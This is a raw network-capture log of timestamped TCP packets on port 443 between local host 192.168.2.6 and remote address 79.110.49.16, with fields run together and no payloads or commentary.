                                                                                                                                                Oct 2, 2024 06:25:32.882638931 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.891901016 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.891917944 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.891983986 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.891989946 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.892030954 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.892539978 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.892555952 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.892616034 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.892626047 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.892663956 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.893176079 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.893193007 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.893249989 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.893255949 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.893424988 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.894167900 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.894197941 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.894258022 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.894263983 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.894356966 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.894778013 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.894798040 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.894855976 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.894860983 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.894901991 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.895359993 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.895375013 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.895431042 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.895437002 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.895481110 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.962989092 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.963013887 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.963083982 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.963093996 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.963136911 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.972311020 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.972327948 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.972448111 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.972455025 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.972503901 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.978820086 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.978837013 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.978904009 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.978909016 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.978949070 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.979614019 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.979631901 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.979691029 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.979696989 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.979738951 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.980148077 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.980168104 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.980227947 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.980233908 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.980278969 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.981525898 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.981547117 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.981605053 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.981605053 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.981616020 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.981647015 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.981687069 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.981729984 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.982055902 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:33.021625042 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:33.021678925 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:33.021800995 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:33.022115946 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:33.022131920 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:33.646259069 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:33.650090933 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:33.650146961 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:33.908490896 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:33.908519983 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:33.908535957 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:33.908660889 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:33.908765078 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:33.908802032 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:33.908824921 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:33.994642973 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:33.994685888 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:33.994755030 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:33.994837046 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:33.994877100 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:33.994899988 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:33.996176004 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:33.996200085 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:33.996273041 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:33.996311903 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:33.996345043 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:33.996365070 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.080782890 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.080811977 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.080909967 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.080943108 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.081007957 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.082032919 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.082052946 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.082134008 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.082149982 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.082206011 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.083106041 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.083127975 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.083178997 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.083193064 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.083228111 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.083251953 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.153908968 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.153932095 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.154068947 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.154083967 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.154249907 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.171246052 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.171272039 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.171375990 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.171518087 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.171518087 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.171550989 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.171574116 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.171591997 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.171626091 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.171636105 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.171663046 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.221364975 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.233603001 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.233628988 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.233861923 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.233896971 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.233959913 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.234045982 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.234061956 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.234122992 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.234138966 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.234194040 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.238895893 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.238913059 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.238991976 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.239012003 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.239068031 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.240046978 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.240063906 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.240120888 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.240139008 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.240173101 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.240195036 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.254066944 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.254086971 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.254156113 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.254192114 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.254206896 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.254236937 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.254930973 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.254950047 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.254996061 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.255003929 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.255032063 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.255048037 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.255511045 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.255532026 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.255580902 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.255589962 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.255619049 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.255629063 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.255978107 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.255995035 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.256046057 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.256055117 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.256093025 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.315067053 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.315093040 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.315205097 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.315231085 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.315284014 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.327373981 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.327406883 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.327510118 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.327526093 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.327677011 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.327852964 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.327872992 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.327918053 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.327931881 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.327958107 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.327980042 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.328259945 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.328282118 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.328325033 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.328339100 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.328371048 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.328392029 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.330495119 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.330518007 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.330648899 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.330665112 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.330720901 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.341264009 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.341291904 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.341404915 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.341420889 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.341573000 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.341886997 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.341917992 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.341965914 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.341978073 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.342011929 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.342032909 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.342451096 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.342473984 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.342531919 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.342545986 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.342591047 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.342976093 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.342994928 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.343043089 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.343061924 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.343085051 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.343111038 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.345252037 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.414614916 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.414644957 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.414819002 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.414863110 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.414978981 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.415213108 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.415237904 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.415294886 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.415314913 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.415344954 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.415366888 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.415786982 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.415807962 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.415852070 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.415865898 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.415893078 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.415913105 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.417947054 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.417970896 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.418026924 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.418040991 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.418067932 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.418087006 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.427992105 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.428006887 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.428097963 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.428137064 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.428302050 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.428750038 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.428765059 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.428809881 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.428823948 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.428850889 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.428869963 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.429156065 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.429172993 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.429239988 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.429239988 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.429260969 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.429299116 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.429733992 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.429749966 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.429812908 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.429832935 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.429857016 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.429883957 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.494365931 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.494410038 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.494538069 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.494580030 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.494606018 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.494628906 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.499175072 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.499221087 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.499262094 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.499279022 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.499301910 CEST4434973779.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.499326944 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.499366999 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.519313097 CEST49737443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.592711926 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.592799902 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:34.592884064 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.593122005 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:34.593149900 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.234067917 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.235483885 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.235579014 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.496848106 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.496874094 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.496891022 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.496958017 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.497021914 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.497056961 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.497087002 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.582865000 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.582904100 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.582998991 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.583061934 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.583111048 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.583844900 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.583863020 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.583926916 CEST49738443192.168.2.679.110.49.16
